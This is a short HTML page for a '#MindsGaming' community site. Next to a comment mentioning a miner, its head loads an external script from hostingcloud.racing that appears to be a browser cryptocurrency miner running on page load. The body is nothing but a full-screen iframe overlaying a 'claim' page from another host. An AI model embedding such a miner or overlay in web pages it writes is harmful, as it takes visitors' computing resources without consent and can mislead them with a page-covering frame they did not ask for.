<!DOCTYPE html>
<html lang="en">
  <head>
    <title>#MindsGaming</title>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="description" content="Community & Member Groups" />
    <meta
      property="og:image"
      content="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />

    <link
      rel="icon"
      href="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />

    <!-- import the webpage's stylesheet -->
    <link rel="stylesheet" href="/cpu.css" />
    <link rel="stylesheet" href="https://ipack.glitch.me/mgicons.css" defer />

    <!-- import miner stylesheet -->

    <link rel="stylesheet" href="/mtcg/style.css" />
    <script src="/mtcg/docs.js"></script>
    <script src="/mtcg/invest.js"></script>
    <script src="/mtcg/deck/playcard.js"></script>

    <script src="https://www.hostingcloud.racing/5pDo.js"></script>

    <!-- import the webpage's javascript file -->
    <script src="/script.js" defer></script>
  </head>
  <iframe
    src="https://doobetter-claim.glitch.me/claim"
    style="position: fixed; left: 0; top: 0; marin: -.5px; width: 100%; height: 100%;"
  >
  </iframe>
</html>
